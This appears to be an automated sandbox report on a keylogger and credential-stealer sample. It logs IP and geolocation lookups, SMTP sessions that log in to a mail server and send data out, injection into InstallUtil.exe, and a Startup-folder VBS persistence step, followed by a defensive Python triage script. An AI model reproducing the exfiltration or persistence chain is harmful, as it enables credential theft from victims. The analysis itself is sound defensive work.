                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Mar 11, 2025 04:11:50.302694082 CET | 127 | OUT | GET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
Mar 11, 2025 04:11:51.657275915 CET | 273 | IN | HTTP/1.1 200 OK
                                                                            Date: Tue, 11 Mar 2025 03:11:51 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Mar 11, 2025 04:11:59.688185930 CET | 127 | OUT | GET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
Mar 11, 2025 04:12:02.258959055 CET | 273 | IN | HTTP/1.1 200 OK
                                                                            Date: Tue, 11 Mar 2025 03:12:02 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49694 | 104.21.80.1 | 443 | 6996 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp | Bytes transferred | Direction | Data
2025-03-11 03:11:39 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                            Host: reallyfreegeoip.org
                                                                            Connection: Keep-Alive
2025-03-11 03:11:39 UTC | 862 | IN | HTTP/1.1 200 OK
                                                                            Date: Tue, 11 Mar 2025 03:11:39 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 362
                                                                            Connection: close
                                                                            Age: 61169
                                                                            Cache-Control: max-age=31536000
                                                                            cf-cache-status: HIT
                                                                            last-modified: Mon, 10 Mar 2025 10:12:10 GMT
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eOFO8A6g8r57Mylm6D9Lsp5%2F8hpxniSE8wRBNN%2BorOL9%2B2QxRBq7pJvGj5hB38VCPAj5lWj0%2FlVAQ2PUJJUd%2FXQ3W5ugMUwofrPyPrhmUjQYKHidrIr5lpKS0QagikL%2FKfp9t1TU"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 91e7dda08a2d0861-MIA
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=45109&min_rtt=39983&rtt_var=16139&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=73708&cwnd=252&unsent_bytes=0&cid=67dd5f7857ed60fb&ts=1120&x=0"
2025-03-11 03:11:39 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49699 | 104.21.80.1 | 443 | 7368 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp | Bytes transferred | Direction | Data
2025-03-11 03:11:53 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                            Host: reallyfreegeoip.org
                                                                            Connection: Keep-Alive
2025-03-11 03:11:54 UTC | 865 | IN | HTTP/1.1 200 OK
                                                                            Date: Tue, 11 Mar 2025 03:11:53 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 362
                                                                            Connection: close
                                                                            Age: 61180
                                                                            Cache-Control: max-age=31536000
                                                                            cf-cache-status: HIT
                                                                            last-modified: Mon, 10 Mar 2025 10:12:13 GMT
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2O1Z%2B1z%2FWys6MhDYHwyTc3locrTzOi%2Fdjj0xjpxeopGwoZ6jx%2FKqRWXf1QWZKXJ3vhZRS9q%2BIY0jkrZLPzrFXqJN%2B5ni4IOy%2FuSfs5DJJp4roWbuh%2FHeXHMZvQZjamIYEEXaT7yC"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 91e7ddf94cd1da9f-MIA
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=41248&min_rtt=40430&rtt_var=9384&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=101176&cwnd=252&unsent_bytes=0&cid=584f472f18c30457&ts=599&x=0"
2025-03-11 03:11:54 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Mar 11, 2025 04:11:47.372541904 CET | 587 | 49696 | 209.182.213.250 | 192.168.2.6 | 220-ecres243.servconfig.com ESMTP Exim 4.98.1 #2 Mon, 10 Mar 2025 23:11:47 -0400
220-We do not authorize the use of this system to transport unsolicited,
220 and/or bulk e-mail.
Mar 11, 2025 04:11:47.372797966 CET | 49696 | 587 | 192.168.2.6 | 209.182.213.250 | EHLO 472847
Mar 11, 2025 04:11:47.620040894 CET | 587 | 49696 | 209.182.213.250 | 192.168.2.6 | 250-ecres243.servconfig.com Hello 472847 [8.46.123.189]
250-SIZE 52428800
250-LIMITS MAILMAX=1000
250-8BITMIME
250-PIPELINING
250-PIPECONNECT
250-AUTH PLAIN LOGIN
250-CHUNKING
250-STARTTLS
250 HELP
Mar 11, 2025 04:11:47.621753931 CET | 49696 | 587 | 192.168.2.6 | 209.182.213.250 | AUTH login bWFpQG5jc3AucGs=
Mar 11, 2025 04:11:47.721255064 CET | 587 | 49696 | 209.182.213.250 | 192.168.2.6 | 334 UGFzc3dvcmQ6
Mar 11, 2025 04:11:47.828789949 CET | 587 | 49696 | 209.182.213.250 | 192.168.2.6 | 235 Authentication succeeded
Mar 11, 2025 04:11:47.829027891 CET | 49696 | 587 | 192.168.2.6 | 209.182.213.250 | MAIL FROM:<mai@ncsp.pk>
Mar 11, 2025 04:11:47.928509951 CET | 587 | 49696 | 209.182.213.250 | 192.168.2.6 | 250 OK
Mar 11, 2025 04:11:47.929924965 CET | 49696 | 587 | 192.168.2.6 | 209.182.213.250 | RCPT TO:<mai@ncsp.pk>
Mar 11, 2025 04:11:48.031462908 CET | 587 | 49696 | 209.182.213.250 | 192.168.2.6 | 250 Accepted
Mar 11, 2025 04:11:48.031651974 CET | 49696 | 587 | 192.168.2.6 | 209.182.213.250 | DATA
Mar 11, 2025 04:11:48.131032944 CET | 587 | 49696 | 209.182.213.250 | 192.168.2.6 | 354 Enter message, ending with "." on a line by itself
Mar 11, 2025 04:11:48.133725882 CET | 49696 | 587 | 192.168.2.6 | 209.182.213.250 | .
Mar 11, 2025 04:11:48.244131088 CET | 587 | 49696 | 209.182.213.250 | 192.168.2.6 | 250 OK id=1trq20-00000005L16-0N1B
Mar 11, 2025 04:12:02.785659075 CET | 587 | 49701 | 209.182.213.250 | 192.168.2.6 | 220-ecres243.servconfig.com ESMTP Exim 4.98.1 #2 Mon, 10 Mar 2025 23:12:02 -0400
220-We do not authorize the use of this system to transport unsolicited,
220 and/or bulk e-mail.
Mar 11, 2025 04:12:02.815756083 CET | 49701 | 587 | 192.168.2.6 | 209.182.213.250 | EHLO 472847
Mar 11, 2025 04:12:02.916202068 CET | 587 | 49701 | 209.182.213.250 | 192.168.2.6 | 250-ecres243.servconfig.com Hello 472847 [8.46.123.189]
250-SIZE 52428800
250-LIMITS MAILMAX=1000
250-8BITMIME
250-PIPELINING
250-PIPECONNECT
250-AUTH PLAIN LOGIN
250-CHUNKING
250-STARTTLS
250 HELP
Mar 11, 2025 04:12:02.930749893 CET | 49701 | 587 | 192.168.2.6 | 209.182.213.250 | AUTH login bWFpQG5jc3AucGs=
Mar 11, 2025 04:12:03.032586098 CET | 587 | 49701 | 209.182.213.250 | 192.168.2.6 | 334 UGFzc3dvcmQ6
Mar 11, 2025 04:12:03.142643929 CET | 587 | 49701 | 209.182.213.250 | 192.168.2.6 | 235 Authentication succeeded
Mar 11, 2025 04:12:03.146120071 CET | 49701 | 587 | 192.168.2.6 | 209.182.213.250 | MAIL FROM:<mai@ncsp.pk>
Mar 11, 2025 04:12:03.249808073 CET | 587 | 49701 | 209.182.213.250 | 192.168.2.6 | 250 OK
Mar 11, 2025 04:12:03.250032902 CET | 49701 | 587 | 192.168.2.6 | 209.182.213.250 | RCPT TO:<mai@ncsp.pk>
Mar 11, 2025 04:12:03.351807117 CET | 587 | 49701 | 209.182.213.250 | 192.168.2.6 | 250 Accepted
Mar 11, 2025 04:12:03.354588985 CET | 49701 | 587 | 192.168.2.6 | 209.182.213.250 | DATA
Mar 11, 2025 04:12:03.454019070 CET | 587 | 49701 | 209.182.213.250 | 192.168.2.6 | 354 Enter message, ending with "." on a line by itself
Mar 11, 2025 04:12:03.454988956 CET | 49701 | 587 | 192.168.2.6 | 209.182.213.250 | .
Mar 11, 2025 04:12:03.565742016 CET | 587 | 49701 | 209.182.213.250 | 192.168.2.6 | 250 OK id=1trq2F-00000005LI1-1j2O
Mar 11, 2025 04:13:26.802114010 CET | 49696 | 587 | 192.168.2.6 | 209.182.213.250 | QUIT
Mar 11, 2025 04:13:27.103971958 CET | 587 | 49696 | 209.182.213.250 | 192.168.2.6 | 221 ecres243.servconfig.com closing connection

                                                                            Target ID:0
                                                                            Start time:23:11:31
                                                                            Start date:10/03/2025
                                                                            Path:C:\Users\user\Desktop\TtLlwb3ava.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\Desktop\TtLlwb3ava.exe"
                                                                            Imagebase:0x490000
                                                                            File size:1'882'112 bytes
                                                                            MD5 hash:1E20CE6BBF686369929E0D191F9607AD
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000000.00000002.1243668980.0000000003979000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1243668980.0000000003979000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_MSILLogger, Description: Yara detected MSIL Logger, Source: 00000000.00000002.1243668980.0000000003979000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1243668980.0000000003979000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1243668980.0000000003979000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1246431997.0000000005380000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1234437287.0000000002971000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000000.00000002.1243668980.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1243668980.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_MSILLogger, Description: Yara detected MSIL Logger, Source: 00000000.00000002.1243668980.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1243668980.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1243668980.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            Target ID:2
                                                                            Start time:23:11:32
                                                                            Start date:10/03/2025
                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                            Imagebase:0x310000
                                                                            File size:42'064 bytes
                                                                            MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000002.00000002.2469589164.00000000003E3000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_MSILLogger, Description: Yara detected MSIL Logger, Source: 00000002.00000002.2469589164.00000000003E3000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.2469589164.00000000003E3000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2472513262.00000000026AB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.2472513262.00000000026AB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:high
                                                                            Has exited:false

                                                                            Target ID:9
                                                                            Start time:23:11:45
                                                                            Start date:10/03/2025
                                                                            Path:C:\Windows\System32\wscript.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Activator.vbs"
                                                                            Imagebase:0x7ff6c3e00000
                                                                            File size:170'496 bytes
                                                                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:10
                                                                            Start time:23:11:45
                                                                            Start date:10/03/2025
                                                                            Path:C:\Users\user\AppData\Roaming\Activator.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\AppData\Roaming\Activator.exe"
                                                                            Imagebase:0xfd0000
                                                                            File size:1'882'112 bytes
                                                                            MD5 hash:1E20CE6BBF686369929E0D191F9607AD
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 0000000A.00000002.1404614295.0000000004735000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.1404614295.0000000004735000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_MSILLogger, Description: Yara detected MSIL Logger, Source: 0000000A.00000002.1404614295.0000000004735000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000A.00000002.1404614295.0000000004735000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000A.00000002.1404614295.0000000004735000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000A.00000002.1376773005.00000000035A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            Antivirus matches:
                                                                            • Detection: 100%, Avira
                                                                            • Detection: 79%, ReversingLabs
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            Target ID:11
                                                                            Start time:23:11:46
                                                                            Start date:10/03/2025
                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                            Imagebase:0xd90000
                                                                            File size:42'064 bytes
                                                                            MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2469459435.0000000000413000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_MSILLogger, Description: Yara detected MSIL Logger, Source: 0000000B.00000002.2469459435.0000000000413000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000B.00000002.2469459435.0000000000413000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2472825182.00000000031C6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000B.00000002.2472825182.00000000031C6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:high
                                                                            Has exited:false
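Read together, the five process records above describe one chain: the sample (Target 0) starts InstallUtil.exe with no arguments (Target 2) and the MassLogger/MSIL Logger Yara rules then fire on memory inside that process; a Startup-folder script, Activator.vbs, is run by wscript.exe (Target 9) and launches a copy of the sample from AppData\Roaming with the same MD5 (Target 10), which repeats the InstallUtil.exe injection (Target 11). The triage below, an added example and not Joe Sandbox code, scores a constructed list of these records for exactly those three indicators. InstallUtil.exe without an assembly path has no legitimate work to do, so a Yara hit inside such a process points at injected code; the decoding of the .sdmp descriptor fields (fifth field 0x40 read as PAGE_EXECUTE_READWRITE, seventh field 0x20000 as MEM_PRIVATE) is an assumption made for this example, not a documented Joe Sandbox format.

```python
"""Triage this report's process records for the injection and persistence chain.
Added example, not Joe Sandbox code. PROCESSES is constructed from the report's
"Target ID" blocks (a subset of fields); the .sdmp descriptor layout decoded in
decode_dump is an assumption made for this example, not a documented format."""
import re
from typing import Dict, List

SAMPLE_MD5 = "1E20CE6BBF686369929E0D191F9607AD"          # from the report
SAMPLE_PATH = r"C:\Users\user\Desktop\TtLlwb3ava.exe"
INSTALLUTIL = r"\microsoft.net\framework\v4.0.30319\installutil.exe"
PAGE_EXECUTE_READWRITE = 0x40                            # Windows constants
MEM_PRIVATE = 0x20000
STARTUP_RE = re.compile(r"\\Start Menu\\Programs\\Startup\\[^\"]+\.(vbs|js|wsf|bat|cmd)", re.I)

PROCESSES: List[Dict] = [
    {"id": 0, "path": SAMPLE_PATH, "cmdline": f'"{SAMPLE_PATH}"', "md5": SAMPLE_MD5,
     "yara": ["00000000.00000002.1243668980.0000000003979000.00000004.00000800.00020000.00000000.sdmp"]},
    {"id": 2, "path": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe",
     "cmdline": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"',
     "md5": "5D4073B2EB6D217C19F2B22F21BF8D57",
     "yara": ["00000002.00000002.2469589164.00000000003E3000.00000040.00000400.00020000.00000000.sdmp"]},
    {"id": 9, "path": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Activator.vbs"',
     "md5": "A47CBE969EA935BDD3AB568BB126BC80", "yara": []},
    {"id": 10, "path": r"C:\Users\user\AppData\Roaming\Activator.exe",
     "cmdline": r'"C:\Users\user\AppData\Roaming\Activator.exe"', "md5": SAMPLE_MD5,
     "yara": ["0000000A.00000002.1404614295.0000000004735000.00000004.00000800.00020000.00000000.sdmp"]},
    {"id": 11, "path": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe",
     "cmdline": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"',
     "md5": "5D4073B2EB6D217C19F2B22F21BF8D57",
     "yara": ["0000000B.00000002.2469459435.0000000000413000.00000040.00000400.00020000.00000000.sdmp"]},
]


def decode_dump(src: str) -> Dict[str, int]:
    """Split 'PID.pass.dumpid.base.protect.?.type.?.sdmp'. Field meaning is an
    assumption: 0x40 matches PAGE_EXECUTE_READWRITE, 0x20000 matches MEM_PRIVATE."""
    f = src.split(".")
    return {"pid": int(f[0], 16), "base": int(f[3], 16),
            "protect": int(f[4], 16), "type": int(f[6], 16)}


def has_arguments(cmdline: str) -> bool:
    """True when anything follows the (possibly quoted) image path."""
    return re.fullmatch(r'"[^"]*"|\S+', cmdline.strip()) is None


def triage(procs: List[Dict]) -> Dict[str, List[int]]:
    """Return target IDs per indicator:
    startup_script       - wscript/cscript running a script from the Startup folder
    sample_copy          - the sample's own MD5 running from a different path
    injected_installutil - InstallUtil.exe started without its mandatory assembly
                           argument and holding Yara-matched RWX private memory"""
    f = {"startup_script": [], "sample_copy": [], "injected_installutil": []}
    for p in procs:
        path, cmd = p["path"].lower(), p["cmdline"]
        if path.endswith(("wscript.exe", "cscript.exe")) and STARTUP_RE.search(cmd):
            f["startup_script"].append(p["id"])
        if p["md5"].upper() == SAMPLE_MD5 and path != SAMPLE_PATH.lower():
            f["sample_copy"].append(p["id"])
        if path.endswith(INSTALLUTIL) and not has_arguments(cmd):
            rwx = [d for d in map(decode_dump, p["yara"])
                   if d["protect"] == PAGE_EXECUTE_READWRITE and d["type"] == MEM_PRIVATE]
            if rwx:
                f["injected_installutil"].append(p["id"])
    return f


if __name__ == "__main__":
    for kind, ids in triage(PROCESSES).items():
        print(f"{kind}: targets {ids}")
```

The same three checks translate directly into endpoint hunts: a .vbs, .js or .wsf in any user's Start Menu\Programs\Startup folder, a binary in AppData\Roaming whose hash matches a known sample, and InstallUtil.exe (or any .NET framework utility) started with an empty command line and no parent that would legitimately invoke it.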
